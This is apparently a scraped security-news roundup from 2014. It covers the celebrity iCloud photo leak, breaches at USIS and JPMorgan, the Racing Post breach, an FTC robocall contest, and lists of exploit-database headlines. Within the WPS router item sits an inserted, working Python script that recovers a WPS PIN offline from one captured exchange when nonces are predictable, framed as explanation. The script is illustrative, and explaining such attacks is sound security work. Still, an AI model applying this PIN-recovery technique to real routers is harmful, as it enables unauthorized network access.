What Jennifer Lawrence can teach you about cloud security

By now you have probably heard about the digital exposure, so to speak, of nude photos of as many as 100 celebrities, taken from their Apple iCloud backups and posted to the "b" forum on 4Chan. Over the last day, an alleged perpetrator has been named by redditors, although the man has declared his innocence. The mainstream media have leapt on the story and gotten reactions from the affected celebrities, who include Oscar winner Jennifer Lawrence, model Kate Upton, and a number of other young actresses.

Someone claiming to be the individual responsible for the breach has used 4Chan to offer explicit videos from Lawrence’s phone, as well as more than 60 more nude “selfies” of the actress. In fact, it seems multiple "b-tards" claimed access to the images, with one providing a Hotmail address associated with a PayPal account and another seeking contributions to a Bitcoin wallet. Word of the images launched a cascade of Google searches and set Twitter trending. As a result, 4Chan/b—the birthplace of Anonymous—has opened its characteristically hostile arms to a wave of curious onlookers hoping to catch a glimpse of their favorite starlets’ naked bodies. Happy Labor Day!

This breach is different from other recent celebrity "hacks" in that it used a near-zero-day vulnerability in an Apple cloud interface. Instead of using social engineering or low-tech research to gain control of the victims' cloud accounts, the attacker basically bashed in the front door, and Apple didn't find out until the attack was over. While an unusually long, convoluted password might have kept an individual account from being cracked, the only real defense against this assault was never to put the photos in Apple's cloud in the first place. Even Apple's two-factor authentication would not have helped.

[web applications] – Facebook – Logout your friends Vulnerability

[web applications] – WordPress FR0_theme theme Arbitrary File Download Vulnerability

[web applications] – WordPress acento theme Arbitrary File Download Vulnerability

[web applications] – WordPress lote27 theme Arbitrary File Download Vulnerability

[web applications] – WordPress NativeChurch theme Arbitrary File Download Vulnerability

[web applications] – WordPress Slideshow Gallery Plugin 1.4.6 – Shell Upload Vulnerability

[web applications] – Arachni Web Application Scanner Web UI – Stored XSS Vulnerability

[web applications] – WordPress CuckooTap Theme & eShop Arbitrary File Download

[web applications] – ManageEngine Desktop Central – Arbitrary File Upload / RCE Vulnerabilities

[web applications] – ManageEngine EventLog Analyzer Multiple Vulnerabilities

Jennifer Lawrence, Rihanna, 98 other celebs’ nude photos leaked online

The anonymous hacker reportedly gained access to the private photos of actress Jennifer Lawrence, as well as images of 99 other celebrities, allegedly via Apple's iCloud storage system.

[papers] – Outsmarted – Why Malware Works in face of Antivirus Software

[webapps] – Multiple WordPress Themes (admin-ajax.php, img param) – Arbitrary File Download

[remote exploits] – NRPE 2.15 – Remote Code Execution Vulnerability

[remote exploits] – Wing FTP Server Authenticated Command Execution Exploit

[local exploits] – HTML Help Workshop 1.4 – (SEH) Buffer Overflow

Hackers stole security check info on at least 25,000 DHS employees

Employees at the Department of Homeland Security may be feeling a bit less secure about their personal data.

On August 2, Department of Homeland Security officials revealed that the agency's contractor for security clearance background checks had been hacked and that an unknown number of DHS employees' personal data from those investigations had been stolen, potentially by a state-sponsored attacker. Now DHS has a handle on how many records were stolen from the contractor, Falls Church, Virginia-based USIS: at least 25,000.

The Associated Press cites information from an unnamed DHS official, who spoke with the service under the condition of anonymity. "Homeland Security will soon begin notifying employees whose files were compromised and urge them to monitor their financial accounts," the Associated Press' Joce Sterman reported.

USIS is, as the Washington Post reported, the largest contract provider of background investigations to the federal government. The attack on USIS follows the March revelation that the US Office of Personnel Management had been attacked by hackers based in China, potentially giving them access to the personal information of millions of government employees, though OPM officials say that no personal data appeared to have been taken before the attack was detected.

Offline attack shows Wi-Fi routers still vulnerable

A researcher has refined an attack on wireless routers with poorly implemented versions of Wi-Fi Protected Setup (WPS) that lets someone quickly gain access to a router's network.

The attack exploits weak randomization, or the lack of randomization, in the secret nonces that some WPS implementations mix into the hashes used to prove knowledge of the device's PIN, allowing anyone who captures a single exchange to recover the PIN with offline calculations. By calculating the correct PIN rather than brute-force guessing the numerical password against the router, the new attack circumvents the rate-limiting and lockout defenses that vendors instituted after the earlier online attacks.

While previous attacks require up to 11,000 guesses, a relatively small number because the protocol confirms each half of the PIN separately (at most 10,000 tries for the first four digits plus 1,000 for the last three and their check digit, rather than 100 million), and roughly four hours to find the correct PIN for the router's WPS functionality, the new attack requires only a single guess plus a series of offline calculations, according to Dominique Bongard, reverse engineer and founder of 0xcite, a Swiss security firm.
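
The offline calculation described above, written out as an added example in Python; it is not Bongard's tool and not code from the article. It models the WPS M3 hashes the way the WPS specification defines them, E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR) with PSK1 the first 128 bits of HMAC-SHA256(AuthKey, first four PIN digits), and likewise E-Hash2 for the second half, then recovers the PIN half by half from one captured M3. The AuthKey and Diffie-Hellman public keys are constructed placeholders, and the weak device is assumed to use all-zero E-S1/E-S2 nonces (the "lack of randomization" case); the same search against properly random nonces finds nothing.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Constructed session values. In a real WPS registration, AuthKey is derived from
# the Diffie-Hellman shared secret and the M1/M2 nonces, and PKE/PKR are the
# enrollee's and registrar's 1536-bit DH public keys. Any fixed bytes serve here,
# because the attack only needs these values to be known, not to be special.
AUTH_KEY = hashlib.sha256(b"constructed AuthKey for this example").digest()
PKE = b"\x11" * 192
PKR = b"\x22" * 192


def wps_checksum(pin7: int) -> int:
    """Check digit for a 7-digit WPS PIN body (digit weights 3,1,3,1,3,1,3)."""
    acc = 0
    n = pin7 * 10
    for weight, divisor in ((3, 10_000_000), (1, 1_000_000), (3, 100_000),
                            (1, 10_000), (3, 1_000), (1, 100), (3, 10)):
        acc += weight * ((n // divisor) % 10)
    return (10 - acc % 10) % 10


def psk_half(auth_key: bytes, digits: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, one half of the PIN)."""
    return hmac.new(auth_key, digits.encode(), hashlib.sha256).digest()[:16]


def e_hash(auth_key: bytes, nonce: bytes, psk: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-Sx || PSKx || PKE || PKR)."""
    return hmac.new(auth_key, nonce + psk + PKE + PKR, hashlib.sha256).digest()


def enrollee_m3(pin: str, weak_rng: bool) -> Tuple[bytes, bytes]:
    """Build the two hashes an access point (enrollee) sends in WPS message M3.

    weak_rng=True models the no-randomization case assumed for this example:
    the device uses all-zero secret nonces. A sound implementation draws E-S1
    and E-S2 from a cryptographic RNG, which is what weak_rng=False does.
    """
    es1 = bytes(16) if weak_rng else secrets.token_bytes(16)
    es2 = bytes(16) if weak_rng else secrets.token_bytes(16)
    return (e_hash(AUTH_KEY, es1, psk_half(AUTH_KEY, pin[:4])),
            e_hash(AUTH_KEY, es2, psk_half(AUTH_KEY, pin[4:])))


def offline_pin_recovery(e_hash1: bytes, e_hash2: bytes,
                         es1_guess: bytes = bytes(16),
                         es2_guess: bytes = bytes(16)) -> Optional[str]:
    """Recover the PIN from one captured M3 when the nonces are predictable.

    Each half is verified on its own, so the search costs at most
    10,000 + 1,000 HMACs instead of 10**8, and none of them touch the router.
    Returns None when no candidate matches, which is what genuinely random
    nonces force: the captured exchange then tells the attacker nothing.
    """
    first = None
    for i in range(10_000):
        cand = f"{i:04d}"
        h = e_hash(AUTH_KEY, es1_guess, psk_half(AUTH_KEY, cand))
        if hmac.compare_digest(h, e_hash1):
            first = cand
            break
    if first is None:
        return None
    for j in range(1_000):
        # The last four digits are three free digits plus the check digit.
        cand = f"{j:03d}{wps_checksum(int(first) * 1_000 + j)}"
        h = e_hash(AUTH_KEY, es2_guess, psk_half(AUTH_KEY, cand))
        if hmac.compare_digest(h, e_hash2):
            return first + cand
    return None


if __name__ == "__main__":
    pin = "12345670"  # constructed: a valid PIN whose check digit is 0
    print("zero nonces   ->", offline_pin_recovery(*enrollee_m3(pin, weak_rng=True)))
    print("random nonces ->", offline_pin_recovery(*enrollee_m3(pin, weak_rng=False)))
```

Once a single M3 has been captured, the attacker needs at most 10,000 + 1,000 HMAC computations, all offline; the 11,000-guess figure for the older online attack comes from the same per-half split, and the difference is only where the work happens. A real implementation has to reproduce the target's actual nonce generator (all-zero here, a predictable generator on other chipsets), and the fix on the router side is simply to draw E-S1 and E-S2 from a cryptographic RNG, at which point the same captured exchange yields nothing.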

The long game: How hackers spent months pulling bank data from JPMorgan

JPMorgan Chase CEO Jamie Dimon said attacks were "going to be non-stop." It looks like he was right.

The electronic attack on JPMorgan Chase’s network, now under investigation by federal law enforcement, apparently spanned months, according to a report by Bloomberg News. Starting in June, hackers used multiple custom-crafted bits of malware to infiltrate the bank’s infrastructure and slowly shipped bits of bank transaction data back out through computers in several countries before it was sent onward to Russia.

The attack, which went on for more than two months before being detected by JPMorgan in a security scan, bears the fingerprints of similar long-game attacks against corporate targets by cybercriminals from Eastern Europe, some of whom have developed capabilities more advanced than state-sponsored hackers. While the details obtained by Bloomberg’s Jordan Robertson and Michael Riley are sparse, the information provided by their sources is consistent with attacks on a number of European banks earlier this year.

While the FBI and National Security Agency are reportedly investigating whether the attack came from Russian state-sponsored hackers—or at least state-sanctioned ones—in retaliation for sanctions against Russia, making that connection will be difficult at best. It seems more likely, based on recent security reports, that the attacks were criminal in nature—but relied on tools and techniques that may have a mixed provenance, using methods honed in attacks on other banks and on government targets for financial gain.

Racing Post let off with stern warning after data breach

The Racing Post, which suffered a data breach affecting over 677,000 users late last year, has been slacking off on its security arrangements since at least 2007. It's been given until the end of February 2015 to get its house in order.

FTC picks winners in latest robocall-defeating contest, scammers keep scamming

On Thursday the Federal Trade Commission (FTC) announced the winners of a robocall-defeating contest that the commission held at DefCon in early August. Three groups of contestants each won $3,133.70 and two runners-up each won $1,337 (for being just that elite). The FTC says it receives 150,000 robocall complaints each month, down from 200,000 per month one year ago.

The contest was called “Zapping Rachel,” for the well-known scam in which a pre-recorded woman's voice tells an unsuspecting phone answerer, “Hi this is Rachel at cardholder services." The FTC separated the contestants into Creator, Attacker, and Detective categories—Creator entrants were asked to build a honeypot to lure robocallers, Detective entrants were given the honeypot data and asked to analyze it, and Attacker entrants were tasked with finding honeypot vulnerabilities. Contestants were given between 24 and 48 hours to submit their entries, depending on the category they entered.

For the Creator category, the prize went to Jon Olawski, who is a software engineering director for an Internet marketing company by day. He built a honeypot that used "an audio captcha filter, call detail analysis, and recording and transcription analysis" to automatically rate whether an incoming call came from a robocaller. In an e-mail to Ars, Olawski described his idea as "a 10-point 'strike' system"; if a caller accumulates a certain number of strikes, that number is flagged as a robocaller and can be placed on a blacklist.

[web applications] – XRMS – Blind SQL Injection and Command Execution Exploit

[web applications] – ManageEngine DeviceExpert 5.9 – User Credential Disclosure

[web applications] – PhpWiki – Remote Command Execution Exploit

[web applications] – Plogger 1.0-RC1 – Authenticated Arbitrary File Upload Exploit

[remote exploits] – Firefox WebIDL Privileged Javascript Injection Exploit

[web applications] – WordPress ShortCode Plugin 1.1 – Local File Inclusion Vulnerability

[web applications] – ActualAnalyzer Lite 2.81 – Unauthenticated Command Execution Exploit

Feds Investigating Breaches At JPMorgan, Other Banks

JPMorgan working with FBI, US Secret Service to determine scope of breach, but other newly reported intrusions at financial firms may not be related.